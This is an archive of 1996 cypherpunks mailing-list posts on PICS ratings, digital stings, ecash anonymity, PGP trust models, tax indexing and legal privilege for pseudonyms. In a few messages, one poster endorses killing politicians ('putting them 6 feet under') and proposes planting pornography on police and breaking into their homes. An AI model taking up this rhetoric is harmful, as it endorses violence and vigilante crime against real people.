reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@mit.edu>
Date: Wed, 8 May 1996 11:50:52 +0800
To: Michael Froomkin <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Police tactics question
Message-ID: <9605071934.AA18729@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 11:26 PM 5/6/96 -0400, Michael Froomkin wrote:
>One of my students has written a paper that may answer some of your 
>questions,  Online Stings: High Tech Entrapment or Innovative Law 
>Enforcement?, by  Jeffrey D. Weinstock
>http://www.law.miami.edu/~froomkin/seminar/papers/weinstock.htm

        Also, I'll stick in a plug for a paper I wrote a year ago for Mitch
Kapor's "Political Economy of the Digital Infrastructure" class at the Media
Lab:


Entrapment in Cyberspace -- On The Likelihood of Digital Stings

http://farnsworth.mit.edu/~reagle/career/stuff/sting.html
_______________________
Regards,       Men govern nothing with more difficulty than their tongues,
               and can moderate their desires more than their words. -Spinoza
Joseph  Reagle      http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@mit.edu>
Date: Wed, 8 May 1996 11:54:30 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: misunderstandings of PICS
Message-ID: <9605071940.AA18800@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 12:48 PM 5/6/96 -0700, you wrote:

>PICS *doesn't*involve*the*page*designer*. this is an absolutely 
>key component of its design. 

        This isn't exactly true (as you indicate later). PICS labels can be
incorporated into the html <meta> tag by the content creator, it can be sent
by way of the http server (using the 'get') or it can be collected from a
third party label bureau.

>I think is going to be far from the main use of ratings in the future)

        However, self rating will be a significant use in the future, and it
is the only way PICS is being used effectively today (at RSAC).

>may be made by different organizations. they may be contradictory.
>this is a basic part of the design of PICS.

        True.

>2. everything in cyberspace must be rated by government agency X,
>and no pages are allowed to be transferred that do not have
>acceptable ratings.
>
>the second is censorship. the first is free choice. the first
>is what PICS aims for. notice it accomplishes this through absolutely
>no action on the part of page designers. by the fact that they
>have a URL, the PICS standard uses that URL as a reference.

        Two may be quite successfully accomplished using PICS. Europe
(Germany and Nazis) and China/Singapore could make quite effective use of
PICS if they require that all browsers in their country be sold with their
rating (censorship) system included (and if they mandate that government
label bureaus _must_ be used.)

        The reason self-rating is mentioned is to forestall the fear of
mandated/arbitrary third party rating. Rather than some MPAA like system
being imposed by the govt., the self-rating was a better political/strategic
position. Also, self rating scales well until third party label bureaus are
sufficiently developed. 
_______________________
Regards,       Men govern nothing with more difficulty than their tongues,
               and can moderate their desires more than their words. -Spinoza
Joseph  Reagle      http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 8 May 1996 13:13:52 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199605072251.PAA01721@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


No one answered me.
What's the best remailer-in-a-box.
I'd like to run one.  I would think people would be falling
over eachother to tell me.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 8 May 1996 10:36:18 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Why I Pay Too Much in Taxes
In-Reply-To: <adb4d18200021004b6ac@[205.199.118.202]>
Message-ID: <Pine.SUN.3.93.960507164120.339A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 7 May 1996, Timothy C. May wrote:

> At 1:17 PM 5/7/96, Clay Olbon II wrote:
> >At 5:34 PM 5/6/96, Timothy C. May wrote:
> >>Also, the effect of inflation has been to inflate salaries and thus inflate
> >>people into higher tax brackets, even when their "real wages" have not gone
> >>up.
> >
> >This used to be true.  A bill passed during the Reagan administration
> >indexed the brackets to inflation to remedy this situation.  I don't know
> >how succesful the bill was in eliminating "bracket creep", but that was the
> >stated purpose.
> 
> No, it _still_ is true. One bill during one administration does not a major
> change make.

I'm not sure I understand what you mean.  I sent the text of the law to
the list.  The position that you take (that increse in inflation can send
you into the next tax bracket) is incorrect.

> Look at the actual rates, average salaries, increases, etc.
> 
> (Sure, there have been all sorts of rate increases, decreases, changes,
> loopholes added, loopholes subtracted, etc. But the fact is that the
> average starting salary for an EE was about $12,000 a year in 1975 and more
> than 30,000 in 1995, with about the same buying power but with tax _rates_
> dramatically higher.)

The bill took effect in 1993. (1992?)

Rates will not change with respect to inflation (to the extent that
inflation is accurately measured by the CPI).

I believe an exception was made for the top bracket in 1994, but I don't
recall how it was implemented.

> --Tim May

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter Wayner <pcw@access.digex.net>
Date: Wed, 8 May 1996 11:21:12 +0800
To: cypherpunks@toad.com
Subject: RSAREF and the Mac...
Message-ID: <199605072103.RAA27829@access5.digex.net>
MIME-Version: 1.0
Content-Type: text/plain



Has anyone ported RSAREF to Metrowerks's compiler for the Mac? 
The PGP project has converted it to run with Think C, but what
about Metrowerks? Also, where can I get plain RSAREF? I couldn't
find it at www.rsa.com. Do I need to sign something?

Thanks,

Peter Wayner




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 8 May 1996 13:42:19 +0800
To: Black Unicorn <tcmay@got.net>
Subject: Re: Why I Pay Too Much in Taxes
Message-ID: <199605080005.RAA09126@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:46 PM 5/7/96 -0400, Black Unicorn wrote:
>On Tue, 7 May 1996, Timothy C. May wrote:
>
>> At 1:17 PM 5/7/96, Clay Olbon II wrote:
>> >At 5:34 PM 5/6/96, Timothy C. May wrote:
>> >>Also, the effect of inflation has been to inflate salaries and thus inflate
>> >>people into higher tax brackets, even when their "real wages" have not gone
>> >>up.
>> >
>> >This used to be true.  A bill passed during the Reagan administration
>> >indexed the brackets to inflation to remedy this situation.  I don't know
>> >how succesful the bill was in eliminating "bracket creep", but that was the
>> >stated purpose.
>> 
>> No, it _still_ is true. One bill during one administration does not a major
>> change make.
>
>I'm not sure I understand what you mean.  I sent the text of the law to
>the list.  The position that you take (that increse in inflation can send
>you into the next tax bracket) is incorrect.

You seem to be forgetting that one of the provisions of (I believe) the 1986 
tax act was that capital gains would be indexed  for inflation.  However, 
the sleazy politicians only scheduled it (the indexing process) for about 
1990 or so, and by 1990 they managed to get that idiot Bush to agree to drop 
it.  I don't know the details, but this is yet another of the reasons I have 
no qualms about advocating a system for solving the "politician problem" by 
putting them 6 feet under.

Lawyers who profit from an abusive system may disagree, of course.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@mit.edu>
Date: Wed, 8 May 1996 13:29:58 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: misunderstandings of PICS
Message-ID: <9605072131.AA20062@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 01:19 PM 5/7/96 -0700, you wrote:

>well, in any case the idea that there should ever be any pressure
>of page designers to include certain tags I find wholly inconsistent
>with the original PICS proposal and rather abhorrent. unfortunately
>it may be unavoidable.

        I understand at one level, but not the visceral response.

>my fear is that the supposed "failure" of self-ratings could be twisted
>by its opponents as evidence that it is inadequate to deal with the
>real problem.

        I think your fears are a little too paranoid here, but maybe they
aren't. The question is how much of this hoopola stems from fundamentalist
thought police, or concerned but ignorant parents/congressmen. If
self-labeling worked (which I see few cases in which it wouldn't) I can't
see the concerned but ignorant being unhappy. Rather they'd be a bit better
educated and feeling pretty secure their kids won't get their hands on
naughty material. And then if self labeling had some failures, that's an
incentive for others to provide third party services (as others have
argued). PICS had to sell itself to the net as much as to the masses.
Self-labeling appeals to the net, it may appeal to the masses, but there are
other things in there to sweeten the deal for them if not.

>I am not against self-ratings, I'm just saying that they seem to
>be the area most ripe for being misunderstood by the public, or
>lead to undesirable situations, and this is already happening.

        Then we should help educate the public. I dislike dumbing the net
down for the masses.

        The real question here -- as far as the public having a fit -- is
the use of digital signatures in the labels. I expect we will not see
signatures used in the first generation of label services or ?compliant?
browsers. Just like ecommerce, it takes a break or catastrophe to get people
to move in a constructful manner on the security front. 
_______________________
Regards,       Men govern nothing with more difficulty than their tongues,
               and can moderate their desires more than their words. -Spinoza
Joseph  Reagle      http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <alex@proust.suba.com>
Date: Wed, 8 May 1996 12:29:37 +0800
To: cypherpunks@toad.com
Subject: ecash payee anonymity, cpunk archives
Message-ID: <199605072236.RAA02543@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


A while back someone posted a note saying that an ecash protocol
garaunteeing payee as well as payer anonymity had been devised.

Did that ever get posted here?  The last message I saw said that it would 
be posted soon.

Also, I missed whatever discussion there was about why the archives got 
shut down.  Was it a copyright thing?  A lack of resources?  No one to 
volunteer?

--
Alex Strasheim, alex@proust.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Wed, 8 May 1996 15:01:40 +0800
To: cypherpunks@toad.com
Subject: ecash moneychangers (Was:  Kid Gloves or Megaphones)
In-Reply-To: <199605051818.LAA13740@dns2.noc.best.net>
Message-ID: <4mordl$1pe@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199605051818.LAA13740@dns2.noc.best.net>,
 <jamesd@echeque.com> wrote:
>
>>>It is true that the issuer is unable to discover that double blinding is
>>>being used. The real problem with the protocol is that it requires
>>>payor/payee collusion, which may make it difficult to execute.
>
>At 07:58 PM 5/4/96 EDT, E. ALLEN SMITH wrote:
>>=09Can the payee discover that the payor isn't colluding before the bank
>>can figure out who the payee is?
>
>If the payor is not colluding, then the payee will immediately discover
>he has not been paid, because the checksums are wrong, and his software
>says "bad payment"
>
>If the payor is colluding, then no matter what he reveals to the bank,
>the bank cannot discover the payee.  Note that with payee anonymity,
>the payee does not have to promptly check in his money, so the bank
>has no hope of narrowing the search by coincidence in time.
>
>But if the payee is colluding, then the payor can be detected by=20
>coincidence in time.

Ah, but if we have the capability to do the fully-anon protocol, we can
suddenly do change-making stations.

The change problem is similar to the problem described above:  what if the
payor wants to buy something, but doesn't have the right change?  Going
to the bank to get change will give away who he is.  The solution:
go to your local moneychanger.

A moneychanger accepts, say, a coin for $0.02 and two blinded half-coins
for $0.01 each.  He deposits the $0.02, and if it clears, has the bank sign
the half-coins, which he returns to the payor (he'll probably blind and
unblind those half-coins, too).  The payor now has the right change, and
all the bank can see is that the moneychanger deposited a $0.02 coin and
withdrew 2 $0.01 coins.  Of course, the moneychanger may charge the payor
an extra bit for the privilege.

In the case of the fully-anon protocol, the payee gives a blinded half-coin
to the payor.  The payor then, as above, sends it (and a service fee)
to the moneychanger, who sends it to the bank (or maybe another moneychanger...
echos of remailers...), yadda yadda.

A moneychanger is a very useful construct for protecting _payor_ privacy
when exact change isn't handy.

Note also that with a system like this, there's no real reason for the payor
to even _have_ an account with the bank...

If (when) the ecash library is released, this will all become pretty
straightforward to implement.

   - Ian "who thinks he understands the ecash protocol, right down to the wire"

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMY/wwkZRiTErSPb1AQEFuAP/WSOBZ1GrK7SVn3s823fgIlQw5TLgvGgX
MJtpsYiF5bREL/8Rcz96YZxw7ZeWYiTbTB+LFb4gqvCQg4/1xnybINYvmowxgPVr
w0WrJ1ZkwgYoEzGFBlXhS4+jH3RGHk2tiB9TB9irjrsv7lK2sBR7ZL1k3sF93LSs
8kLCK/iiF5M=
=PV1S
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 8 May 1996 12:25:41 +0800
To: froomkin@law.miami.edu
Subject: Re: Police tactics question
Message-ID: <01I4FM57A02G8Y59D8@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"froomkin@law.miami.edu"  "Michael Froomkin"  6-MAY-1996 23:23:44.91

>One of my students has written a paper that may answer some of your 
>questions,  Online Stings: High Tech Entrapment or Innovative Law 
>Enforcement?, by  Jeffrey D. Weinstock
>http://www.law.miami.edu/~froomkin/seminar/papers/weinstock.htm

	Thank you; I found it using Alta Vista earlier.

>Note:  these are *student* papers.  Not everything in them is exactly right.
>And no, I won't tell you their grades.

	Any egregrious errors in that one?
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 8 May 1996 12:56:19 +0800
To: cypherpunks@toad.com
Subject: Freedom of Information Act
Message-ID: <01I4FMARJF1A8Y59D8@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	IIRC, the FOI act has come up here before. Possibly this list may
provide some answers.
	-Allen

From:	IN%"rre@weber.ucsd.edu"  7-MAY-1996 00:36:11.83
From: Phil Agre <pagre@weber.ucsd.edu>

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
This message was forwarded through the Red Rock Eater News Service (RRE).
Send any replies to the original author, listed in the From: field below.
You are welcome to send the message along to others but please do not use
the "redirect" command.  For information on RRE, including instructions
for (un)subscribing, send an empty message to  rre-help@weber.ucsd.edu
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Date:         Thu, 2 May 1996 17:23:13 -0400
Sender: State and Local Freedom of Information Issues <FOI-L@LISTSERV.SYR.EDU>
From: "Barbara C. Fought" <bcfought@MAILBOX.SYR.EDU>
Subject:      how-tos for FOI-L

I've gotten several questions lately about the correct address for this
mailing list discussion. It changed a year ago. Some of you may want to
unsubscribe for the summer. Or put this on digest (all messages once a week)
or vacation stop. Save this message for future reference.

For any change in service you send an e-mail message to:
        listserv@listserv.syr.edu

In the body of the message you type one of the following, depending on
what you want to do:

        WHAT YOU WANT                   COMMAND (put in body of email
        TO DO                           message, not in the subject line)

        subscribe                 subscribe FOI-L firstname lastname
        unsubscribe               unsubscribe FOI-L
        get a digest              set FOI-L digest
        vacation stop             set FOI-L nomail
        resume delivery           set FOI-L mail
        list of subscribers       review FOI-L

_____________________________________________________________________________
Barbara Croll Fought                        Asst. Prof., Broadcast Journalism
list manager, FOI-L                  S.I.Newhouse School, Syracuse University
bcfought@mailbox.syr.edu                                 215 University Place
voice: 315/443-4054  fax: 315/443-3946                Syracuse, NY 13244-2100
_____________________________________________________________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 8 May 1996 12:31:44 +0800
To: reagle@mit.edu
Subject: Re: Police tactics question
Message-ID: <01I4FN0D5W6Q8Y59D8@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"reagle@mit.edu"  "Joseph M. Reagle Jr."  7-MAY-1996 15:31:28.97

>        Also, I'll stick in a plug for a paper I wrote a year ago for Mitch
>Kapor's "Political Economy of the Digital Infrastructure" class at the Media
>Lab:

>Entrapment in Cyberspace -- On The Likelihood of Digital Stings

>http://farnsworth.mit.edu/~reagle/career/stuff/sting.html

	Actually, I found that one also. Nice things, web search robots.
	Thanks,
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 8 May 1996 13:56:46 +0800
To: hfinney@shell.portal.com
Subject: MLM and Web of Trust
Message-ID: <Pine.SUN.3.93.960507184604.339D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----


On Tue, 7 May 1996, Hal wrote:

> I have a few thoughts relating to the "web of trust" versus
> hierarchical key certificate systems.  This description is pretty
> elementary and is intended more for people who have not been familiar
> with the issues before.  First some background.

[Excellent background deleted]

[Trust is not transitive.]

> The [trust is not transitive] situation reminds me of a maxim of
> multi-level marketing (MLM) companies like Amway.  These businesses
> typically sell a product, but they use a pyramid scheme for distribution 
> where people not only sell the product, but try to recruit others to
> sell for them. 
[...]
> To achieve success, though, the saying goes like this: You not only
> have to sell; you not only have to teach your people to sell; but you
> have to teach your people to teach people to sell.
[...]
> The analogy to transitivity of trust is this.  If you want to have
> transitive trust, you have to be sure the other person knows how to
> securely sign keys.  But you also have to make sure he knows how to
> make sure that the next person knows how to securely sign keys.  And
> further you have to make sure he knows how to make sure the next guy
> knows how to make sure, and so on.

[PGP avoids transitive trust because of this problem and others]

Ok, so if the problem is with transitive trust and not the technical issue
of security of signatures, why not a hybrid of the vertical and web
models?

PGP's primary problem in my view is that signatures are not flexible
enough, or they are too flexible.  A signauture can mean anything.  When I
sign a document signed by Bob, does that mean that I am vouching for Bob
as the author of this document, or that I agree with the document, or that
I certify that the document (regardless of my belief in its points) merely
passed by my desk on this date?

Similarly, when I sign a key.  Am I of the opinion that the "real name"
associated with this person is the only person in possession of the key,
of the opinion that this person is indeed (insert real name here) or am I
siging off on the e-mail address?

It seems to me that two things need to happen to improve the web of trust.

First, signatures have to be application specific.  Sure you can put the
words "This signature means that I believe XYZPDQ etc." at the bottom of
that which you are signing, but this method both lacks any kind of
standardization and further requires some sophisticated logical thinking
and a lot of planing by the average user.

I'd much rather see signature applications integrated in the software in a
simple way.

PGP currently asks:

READ CAREFULLY:  Based on your own direct first-hand knowledge, are
you absolutely certain that you are prepared to solemnly certify that
the above public key actually belongs to the user specified by the
above user ID (y/N)?

Why should PGP not also ask:

READ CAREFULLY:  Based on your own direct first-hand knowledge, are
you absolutely certain that you are prepared to solemnly certify that
the above document is accurate in all respects (y/N)?

or

READ CAREFULLY:  Based on your own direct first-hand knowledge, are
you absolutely certain that you are prepared to solemnly certify that
the above user is a careful and competent individual with the skill and
means to secure his secret key (y/N)?

or

READ CAREFULLY:  Based on your own direct first-hand knowledge, are
you absolutely certain that you are prepared to solemnly certify documents
signed by the above key are from the internet address associated with it
(y/N)?

or

READ CAREFULLY:  Based on your own direct first-hand knowledge, are
you absolutely certain that you are prepared to solemnly certify that
the above financial transaction corresponds to your exact wishes (y/N)?

or

READ CAREFULLY:  Based on your own direct first-hand knowledge, are
you absolutely certain that you are prepared to solemnly certify that
the above user is not only a trusted introducer, but is fit in your
estimation to gague the security and signing skills of other users and
vouch for their fitness as trusted introducers  (y/N)?


It seems to me that integrating these issues, having a developer think
them out ahead of time for the user would be a valuable thing.  This
solves, to some degree, Mr Finney's "AOL" problem. (Wherein he expresses
concern over the differing skills of internet users and the ways these
difference complicate the web of trust).

Part of having an effective web of trust is defining exactly what a
certification means.  I don't think the web of trust fails because it is
non-vertical, but because it fails to define what certificates mean.  It
_imposes_ (or at least suggests) horizontal decision or treatment of a
certificate when it may be prudent for novice or moderately skilled users
to treat them vertically.  Yet to simply switch to a vertical scheme will
frustrate expert users who wish to maintain the flexibility of a
horizontal one for whatever reason.  (They don't trust institutions,
prefer to have more stringent or otherwise non-standard certification
policies, etc.)

Using certification that allows either (but perhaps defaults to vertical)
can easily be envisaged.

Software could be configued to trust only a institutional certifier to
designate trusted introducers as a default, (Perhaps an online security
mutiple test would be a good way for such an institution to make the
determination?) and yet users who wanted other schemes could select the
more expert options and designate their own introducers and introducer
introducers.

READ CAREFULLY:  Do you trust the above user to (enter all that apply):

A) Introduce other keys for the purposes of secure communications and
document certification with those keys?
B) Vouch for the security consciousness of other users?
C) Vouch for the fitness of other users to certify introducers for your
web of trust?
D) Vouch for the financial fitness of other users?

(etc.)

Really it's no more than an extension of the "trust bit" that is already
in PGP signatures to other areas.

In addition I think it's important to extend this kind of flexibility to
all manner of signing activites.

I revoked a key some time ago because it was getting old and because 2048
bit keys were made available.  That revocation certificate could mean
anything.  It could mean I KNOW it was compromised, it could mean I
suspected it was, it could mean I found my secring.pgp file on a multiuser
system where I did not myself put it, it could mean I left a disk with my
secring.pgp on it in a library, or it could mean the key expired.

How are you to know unless I write up a complicated statement and sign it
and take pains to publish it all over creation?

Why doesn't PGP simply ask:

Are you:
A) Certain this key is compromised?
B) Of the view that it is probably compromised?
C) Worried it might be compromised?
D) Revoking this key because it is expired?
E) Issuing a general/non-specific revocation?

Again, standardized, easy for the user to understand, easy to distribute,
and very clarifying.

Someone could easily write a module which defined and updated these
differing trust issues for PGP and users could pick the codes they
prefered.  (A trust model flash rom?)

fincer - Certification with respect to financial integrity
ident1 - Certification with respect to true name identity
ident2 - Certification with respect to accuracy of e-mail account
secrt2 - Certification with respect to the users ability to keep a secret.

etc.


Don't force clever and sophisticated users to bow to a vertical system
when they don't have/want to.

> Hal Finney

- ---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMY/SZmqgui0rHO4JAQFkfwP/XqGH79Z0HX0fF8FvtrxAZB5JbnaMi3K4
gwt1zlQD8ni3n8+6fD887u6vyqxwty8AuQ4BwdxfPfFNecfgcZ8BHv8F1aMopV1x
4clVrHknaKo1BR83MEiEpN74yFebj0fsTlLxijLDbUA5z33Spmcn5Eek21nv4yXR
W1ZWUd5uSIk=
=vpLU
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 8 May 1996 13:14:46 +0800
To: unicorn@schloss.li
Subject: Re: Attorney-Client / Nyms
Message-ID: <01I4FNT4BGR48Y59D8@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"unicorn@schloss.li"  "Black Unicorn" 29-APR-1996 02:21:48.23

>On Sun, 28 Apr 1996, E. ALLEN SMITH wrote:

>> 	Given discussions as to attorneys holding passphrases, et al, perhaps
>> a tutorial from the lawyers on the list (yourself and others, since
>> disagreements among J.D.'s have been known to happen) on what attorney-client
>> confidentiality does cover?

>Proposed FRE 503 probably has the best codification of the prevailing
>common law on the subject.  I reproduce it in part below.  Typos are mine.

	Thank you.

>Note the confidentiality requirement.  A client is estopped from claiming
>privilege if he discloses the content of the communication to a third
>party not connected to the attorney-client relationship.

	Understandable.

>The identity of the client and the existance of the attorney client
>relationship are not confidential.  There are some exceptions.

	What are the exceptions?

>Communications regarding future crimes or frauds are not protected.

	I kind of knew that already... as should others.

>Stolen property may be held by an attorney for a reasonable time for
>inspection purposes, but must be returned to the rightful owner or the
>attorney will be a receiver of stolen goods and participating in an
>ongoing crime.  Privilege will thus not apply.  In re Ryder, 263 F.Supp.
>360 (E.D.Va 1967).  (Some courts will permit the attorney to refuse to
>disclose the source from which he obtained the property, however).
>Consider this in the context of trade secrets.

	A good point... although if it hasn't been proven whether something is
stolen (e.g., an encrypted piece of data sent to the attorney), I would hope
that privilege would still obtain. Of course, there would be the question
(also important for First Amendment issues) of whether information that the
recipient can't understand is communication.

>All states have laws against destroying or concealing evidence.  The
>attorney who advises his client to destroy evidence is a co-consiprator.
>Privilege does not apply.  Clark v. State, 261 S.W.2d 339 (Crim. App Tex.
>1953).  (Interesting to wonder if advising a client to encrypt evidence is
>'concealing' it).

	A good question. Of course, again there's the point of what if the
attorney has investigated the matter and decided that no crime is being
committed, but that the material should be destroyed because it could be
embarrasing, lead to other problems (e.g., civil lawsuits), etcetera. If a
court later decides that the attorney was wrong, would privilege still obtain,
and would the attorney be a co-conspirator? I would hope the answers would be
yes and no.

>> 	Most of them aren't anonymous, either... although that does give me
>> the thought of going to one outside the US and its reporting requirements.
>> They'd know who I was (or at least the address it was going to), but at
>> least nobody else would know. Any suggestions, since you've been writing of
>> the joys of nymdom recently?

>I suggest you use a forwarding service, sign up with your nym name, and
>provide the address of a P.O. box for them to forward to, also in the name
>of your nym.

	The P.O. box signed up in the name of the nym would be a problem,
however, given the current laws on ID necessary for this. Of course, this
assumes not using fake ID (including that of a fictitious employer). I've
gotten a couple of P.O. boxes in my own name recently (not wanting to disclose
my current address), and they did want a couple pieces of ID. I should check
what ID they will accept.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 8 May 1996 14:51:33 +0800
To: "Joseph M. Reagle Jr." <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Police tactics question
Message-ID: <199605080158.SAA22331@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:33 PM 5/7/96 -0400, Joseph M. Reagle Jr. wrote:
>At 11:26 PM 5/6/96 -0400, Michael Froomkin wrote:
>>One of my students has written a paper that may answer some of your 
>>questions,  Online Stings: High Tech Entrapment or Innovative Law 
>>Enforcement?, by  Jeffrey D. Weinstock
>>http://www.law.miami.edu/~froomkin/seminar/papers/weinstock.htm
>
>        Also, I'll stick in a plug for a paper I wrote a year ago for Mitch
>Kapor's "Political Economy of the Digital Infrastructure" class at the Media
>Lab:
>
>
>Entrapment in Cyberspace -- On The Likelihood of Digital Stings

Here's a question:  Why can't we do stings OF POLICE, not by police?  If 
they can mail porno to people and have them arrested, why can't we identify 
thug-types on the net, email them porno (perhaps from out of the country, to 
keep the sender legal) and then break into their houses and arrest them?

What?  What's sauce for the goose ISN'T sauce for the gander?



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 8 May 1996 14:08:40 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Why I Pay Too Much in Taxes
Message-ID: <199605080206.TAA24111@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:30 PM 5/7/96 -0400, Black Unicorn wrote:
>On Tue, 7 May 1996, jim bell wrote:
>
>> At 04:46 PM 5/7/96 -0400, Black Unicorn wrote:
>
>> >I'm not sure I understand what you mean.  I sent the text of the law to
>> >the list.  The position that you take (that increse in inflation can send
>> >you into the next tax bracket) is incorrect.
>> 
>> You seem to be forgetting that one of the provisions of (I believe) the 1986 
>> tax act was that capital gains would be indexed  for inflation.  However, 
>> the sleazy politicians only scheduled it (the indexing process) for about 
>> 1990 or so, and by 1990 they managed to get that idiot Bush to agree to drop 
>> it.
>
>Considering that there is one bracket for capital gains income (namely
>28%) what does this have to do with bouncing you into the next income tax
>bracket?

Well, you can play all the word-games you want, but many people use the term 
"tax bracket" to mean the amount of tax they pay as a proportion of income.  
(Too bad the IRS hasn't yet defined the term "income"!)    Since 
inflationary gains on assets shouldn't be counted as "income" at all, people 
end up paying a larger proportion of their income as taxes due to this.  Go 
ahead, play games, but ultimately the amount they write on the check will be 
increased as a result of inflation.  I doubt whether they would be in any 
mood to accept a picky technical definition.

It is these people that will eventually decide that it's better to pay money 
to go to government employees' detriment, rather than benefit.




Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 8 May 1996 12:47:55 +0800
To: vznuri@netcom.com
Subject: Re: misunderstandings of PICS
Message-ID: <01I4FO6FNHVA8Y59D8@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"vznuri@netcom.com"  "Vladimir Z. Nuri"  6-MAY-1996 18:53:10.45

>but OK, I see that the CyberAngels have focused on a part of the
>PICS proposal that can be twisted into their own unique interpretation.
>I see you/they have a semi-valid concept here. frankly, it only suggests
>to me how dangerous the "self-rating" concept is, and perhaps that
>it should be downplayed in the PICS proposal imho. (any PICS designers
>out there listening?)

	The simplest cure for this, and one that would be effective - unlike
implorings by the PICS designers - would simply be to not have inclusion of a
rating in a page as part of the protocol. In other words, if you want a
rating, get it from an agency.

>> Yes, this is an abuse of the market oriented variety of PICS;
>>they obviously don't know and/or don't care. If you want to convince them
>>otherwise, start cc:ing your messages (and forwarding mine, on this I give
>>you permission) on PICS and the CyberAngels to angels@wavenet.com.

>since you are so interested and brought it up, I think you ought to
>do it. I am doing all that I care to do in posting to this group. you
>have given me reason to write on the issue.

	As I have previously stated, I irritated Mr. Hatcher by trying to get
the CyberAngels to concentrate on spamming and other actual dangers to the Net,
as opposed to their censorship efforts. (I count acting as an informant for
governmental censorship a variety of censorship). Consequently, I have been
asked not to mail to them.

